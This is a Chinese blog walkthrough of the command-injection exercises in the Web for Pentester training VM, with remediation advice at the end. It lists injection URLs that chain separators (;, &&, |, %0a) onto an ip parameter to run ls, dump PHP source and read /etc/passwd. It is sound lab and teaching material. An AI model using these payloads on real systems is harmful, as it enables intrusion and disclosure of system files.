web for pentester之command injection

最新推荐文章于 2022-05-22 19:20:03 发布
最新推荐文章于 2022-05-22 19:20:03 发布
阅读量766 收藏 4
点赞数 1
分类专栏: 命令执行漏洞 文章标签: web for pentester 命令执行漏洞 command injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jone_Dom/article/details/89854057
版权

web for pentester之命令执行漏洞

(命令执行漏洞)
开启pentester虚拟机:
在这里插入图片描述

开启之后,输入ipconfig查看虚拟机ip地址;我这里虚拟机的ip地址为192.168.145.131;

在物理机上的Firefox地址栏中输http://192.168.145.131

进入web for pentester主页:

点击选择Commands injection(命令执行)测试:

windows支持:

|
ping 127.0.0.1|whoami

||
ping 2||whoami (哪条名令为真执行那条)

& &&
ping 127.0.0.1&&whoami

选择example1:

Example1:
在这里插入图片描述

url 为http://192.168.145.131/commandexec/example1.php?ip=127.0.0.1

显示的是ping 127.0.0.1的内容,只ping了2次。

考虑到服务端代码可能为system(“ping -c 2”.$ip);

那么$ip用等符号间隔可再多执行些命令。可用;,,,&,&&,等,这其中有的需要第一个命令报错才执行第二个命令。
http://192.168.145.131/commandexec/example1.php?ip=127.0.0.1; ! ls
在这里插入图片描述

http://192.168.145.131/commandexec/example1.php?ip=127.0.0.1; ! cat example1.php
在这里插入图片描述

http://192.168.145.131/commandexec/example1.php?ip=127.0.0.1; ! cat /etc/passwd
在这里插入图片描述在这里插入图片描述

http://192.168.145.131/commandexec/example1.php?ip=127.0.0.1%26%26cat
/etc/passwd (//%26是&的urlencode)
在这里插入图片描述
在这里插入图片描述

http://192.168.145.131/commandexec/example1.php?ip=1127.0.0.1%26cat
/etc/passwd
在这里插入图片描述
在这里插入图片描述

http://192.168.145.131/commandexec/example1.php?ip=1127.0.0.1cat
/etc/passwd (//ab,必须是a报错b才能执行)
在这里插入图片描述

Example2:
在这里插入图片描述

url为http://192.168.145.131/commandexec/example2.php?ip=127.0.0.1,显示的与之前的一样。
在这里插入图片描述

先用;ls试,显示Invalid IP
address,说明对ip提交的值进行了过滤,应该用了preg_grep等,希望使用了/m参数,用%0a进行截断试试。

http://192.168.145.131/commandexec/example2.php?ip=127.0.0.1 ls

在这里插入图片描述

http://192.168.145.131/commandexec/example2.php?ip=127.0.0.1 cat
example2.php在这里插入图片描述
成功。
查看源代码:
在这里插入图片描述

以后用preg千万别用/m,/e,但多用/i。

Example3:
在这里插入图片描述

url为http://192.168.145.131/commandexec/example3.php?ip=127.0.0.1,显示的与之前的一样。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

分别尝试了各种符号连接和%0a,包括把ip写成其它的,都显示ping通了。

查看源代码:

f (!(preg_match(’/^\d.\d.\d.\d$/’,
$_GET[‘ip’]))) { header(“Location: example3.php?ip=127.0.0.1”);

原来是如果ip不是ip地址格式,则跳转到ping 127.0.0.1。

这个地方如果用burp抓包:
在这里插入图片描述

能抓到两个包。第一个包302,但是执行命令成功的,能把后续的ls或cat发回客户端,但马上被第二个正常ping的包覆盖后显示了。

命令执行漏洞的一些安全建议:

  1. 尽量不要执行外部命令。

  2. 使用自定义函数或者函数库来代替外部命令的功能。

  3. 使用escapeshe||arg函数来处理命令参数。

  4. 使用safe_mode_exec_dir指定可执行文件的路径。(safe_mode_exec_dir指定路径时可以把会使用的命令提前放入此路径内。)

  5. 应用程序防御命令注入漏洞,通过做正确的输入验证和消毒。 开发人员必须考虑所有情况下,应用程序调用一个壳状系统功能,如执行或系统,避免执行,除非参数被正确地验证和消毒。 有两种可能的方法来验证这些参数:使用黑色列表或使用白名单。黑名单检查,然后才允许执行恶意模式。 命令注入的情况下,一个黑色的命令列表可能包含分隔符,如分号(;)垂直划线(|),双破折号(| |),双放大器(&&)危险的命令,如RM,CP,猫,LS,在净参数,netstat,DEL,复制等, 但是,一个主要的缺点阻碍了这种对策是有效的,除非黑名单绝对是所有涉及危险的可能性,攻击者可以找到以外的黑名单的变化,来进行攻击。  白名单与安全执行模式匹配, 如果有问题的数据不匹配任何安全模式,这是不允许的。 这危险的构造,因为任何新的(恶意)结构的新变化,不符合安全的解决了这个问题一种是系统自动封锁。 一个共同的方式来实现白名单是相匹配的输入与安全的命令格式的正则表达式表示。 然而,复杂的正则表达式可以写和解释。 开发人员必须确保他们了解如何编写和解释正则表达式之前实施这一防御。
花果刺客
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web for pentester 之xss 篇
Merc_A的专栏
11-09 1679
1、很明显了,地址栏里name=hacker。直接name=alert(1)。 2、还是先试一下alert(1),,输出只有alert,script不见了,先换大小写试一下,成功了。。 3、还是先试一下alert(1),发现还是只输出了alert(1),换大小写也没有用,我的和呢,肯定是后台被注释掉了,那就这样pt>alert(1)ript>。 这样他注释掉一个我们还有一个。 4、你会
Web for PentesterI 代码注入-实战篇
u011975363的专栏
04-25 1281
本文主要是根据官网和网上的教程进行实战,详细讲解请参照 1、https://pentesterlab.com/exercises/web_for_pentester/course 2、http://www.freebuf.com/sectool/168653.html 关于代码注入的相关知识:代码注入的原理,检测,利用,下次在补充。 一、example1 1、判断是否存在注入,在url...
Web for pentester_writeup之Commands injection
ditanji3425的博客
08-08 274
Web for pentester_writeup之Commands injectionCommands injection命令行注入) 代码注入和命令行注入有什么区别呢,代码注入涉及比较广泛,凡是由于过滤不严格或者是逻辑问题导致的可以插入恶意代码,都属于代码注入。而命令注入就局限于system函数的过滤不严格导致执行了系统命令。 总之就是代码注入主要是执行php代码,而命令注入主...
【渗透测试学习平台】 web for pentester -1.介绍与安装
07-21 1271
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pentester_II   安装流程:   1、新建一个空白的虚拟机   2、选择w...
Web for Pentester SQL注入example 1-7 答案解析
u011975363的专栏
04-16 5120
pentester lab镜像下载地址为https://pentesterlab.com/exercises/web_for_pentester/course,下载.iso镜像,在虚拟机中搭建,查看虚拟机ip,在浏览器中输入虚拟机Ip,即可看到练习题界面,sql注入的界面如图所示: 一、example 1 1、首先判断是否存在注入点及注入类型 由此可知,存在字符型注入,且没有设置...
渗透测试学习平台-web for pentester
专注于性能调优、安全、自动化
04-24 4024
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 如: XSS跨站脚本攻击 SQL注入 目录遍历 命令注入 代码注入 XML攻击 LDAP攻击 文件上传 以及一些指纹识别的技术 下载 web_for_pentester.
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web-for-pentester源码.rar
最新发布
07-13
web-for-pentester源码
web_for_pentester.zip
11-26
web_for_pentester
Web for Pentesters I
CD的博客
03-28 422
Web for Pentesters
web for pentester XSS部分练习
若为此弦
08-21 3776
example 1 url上改成name=
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1509
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
fopen()函数
热门推荐
天行健
06-29 12万+
1.2 文件的输入输出函数 键盘、显示器、打印机、磁盘驱动器等逻辑设备, 其输入输出都可以通过文件管理的方法来完成。而在编程时使用最多的要算是磁盘文件, 因此本节主要以磁盘文件为主, 详细介绍Turbo C2.0提供的文件操作函数, 当然这些对文件的操作函数也适合于非磁盘文件的情况。 另外, Turbo C2.0提供了两类关于文件的函数。一类称做标准文件函数也称缓冲型文件函数
WebPentester学习笔记
04-01 1044
web安全接触有一段时间了,但水平一直不见提高,归根结底是自己执行力不够,做事太过拖拉,导致技术水平没什么长进,为了督促自己,现开始更新博客,记录自己的学习历程。web安全的学习使用之前小伙伴推荐的Web for pentester,相关的资源大家可以到这里去查找。只需要下载一个镜像,使用虚拟机家装,就可以对常见web安全漏洞进行模拟攻击,相比单纯的看文档来说,更加有操作性。
Web for pentester_writeup之Code injection
ditanji3425的博客
08-08 357
Web for pentester_writeup之Code injection篇 Code injection(代码注入) Example 1 <1> name=hacker’ 添加一个单引号 <2> name=hacker” 添加一个双引号 返回报错信息,分析可知执行了eval()程序 继续测试 这块有点复杂,我们先看一下源代码 <?php re...
Web for pentester_writeup之XML attacks篇
ditanji3425的博客
09-25 340
Web for pentester_writeup之XML attacks篇 XML attacks(XML攻击) Example 1 - XML外部实体注入(XXE) Payload http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd...
Web for pentester_writeup之File Include篇
ditanji3425的博客
08-08 276
Web for pentester_writeup之File Include篇 File Include(文件包涵) Example 1 加一个单引号 从报错中我们可以获取如下信息: 当前文件执行的代码路径: /var/www/fileincl/example1.php 文件包含代码引用函数 include() 代码引用的文件路径:include_path= /usr/share/p...
Web for Pentester SQL sql注入靶场
weixin_45715461的博客
05-22 615
Web for Pentester SQL sql注入靶场
Web渗透测试入门:Web for Pentester平台详解
"web_for_pentester.pdf 是一个由安全研究者Louis Nyffenegger创建的Web渗透测试教程,旨在帮助用户了解和掌握常见的Web漏洞检测技术。此资源涵盖了一系列主题,包括Web应用的安全模型、Web技术、HTTP协议、客户端与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值